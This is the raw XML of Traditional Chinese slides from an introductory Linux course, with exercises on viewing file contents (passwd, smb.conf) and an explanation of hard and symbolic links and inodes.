              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0" smtClean="0"/>
              <a:t>如何</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>由最後一行開始連續顯示檔案 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>內容？ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>如何一頁一頁的顯示檔案 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samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0" err="1"/>
              <a:t>smb.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3100" dirty="0"/>
              <a:t>內容，但不能前後翻頁？ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3100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789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755984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>如何查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>smb.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>，且可前後翻頁？   </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0"/>
              <a:t>less </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>smb.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>時</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>，查詢</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0" smtClean="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>字詞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>如何只</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>顯示</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>smb.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0"/>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>行內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>如何只查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>smb.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>前面 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0"/>
              <a:t>15 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>如何只查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>/samba/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1"/>
              <a:t>smb.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>後面 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0"/>
              <a:t>15 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0"/>
              <a:t>行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2900" dirty="0" smtClean="0"/>
              <a:t>？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2900" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="29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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作</a:t>
            </a:r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721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18864" y="1266825"/>
            <a:ext cx="8229600" cy="4859338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>複製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>檔案直接複製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>方式，會佔用磁碟空間。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>耗費儲存設備</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>資源。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>使用者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>cassia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>目錄中，存放一個大小為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>1502892 bytes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>檔案名稱為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>ForEveryOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>使用者 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>lambert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>也要用這個檔案，他可以將 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>ForEveryOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>複製到自己的目錄中，如此一來， </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>ForEveryOne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>就分處兩地，整整佔用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>3005784 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
              <a:t>bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>的磁碟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>空間。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW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連結概念</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>複製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0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0933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常見的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UNIX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DOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Linux/FreeBSD</a:t>
            </a:r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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mac OS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Embedded Operation System(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>嵌入式作業系統)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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>家族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</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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3923928" y="2564904"/>
            <a:ext cx="4248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柏克萊大學 開發的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>UNIX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3632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18864" y="1266825"/>
            <a:ext cx="8229600" cy="4859338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>為何需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>因為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>系統是多人</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>多工</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
              <a:t>作業</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>系統，且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>過去半導體製程技術不如現今發達，因此過去硬體資源有限及昂貴。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0">
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>是否有更節省資源的方式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3000" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>建立連結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小容量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可以解省大量的空間</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>直接指向或是間接指標</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中兩種連結</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>硬</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>實體連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>建一個指標直接指向一個檔案的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>軟</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>符號連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0" smtClean="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>對</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>一個檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>的間接指標。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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ux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>連結介紹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080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連結介紹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硬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實體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特徵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指標</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指向了一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>inode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>位址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>硬連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>和原始檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用了相同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/>
              <a:t>檔案</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>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連結數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>會</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>從</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>變為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2 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刪除原始檔案連結檔內容仍可使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>類似分身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檔案和硬連結</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檔案屬性</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>相同且同步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1</a:t>
            </a:fld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/>
          <a:srcRect l="4214" t="13064" r="5231" b="3832"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348577" y="4506251"/>
            <a:ext cx="5202578" cy="210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86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硬連結示意圖解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以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及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/root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檔案為例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 5" descr="62.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="15801" t="54353" r="15344" b="4046"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1763688" y="1933656"/>
            <a:ext cx="4702794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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文字方塊 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="4005064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透過</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>inode1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>可找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>兩個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>不同的檔案，但不管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用哪個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
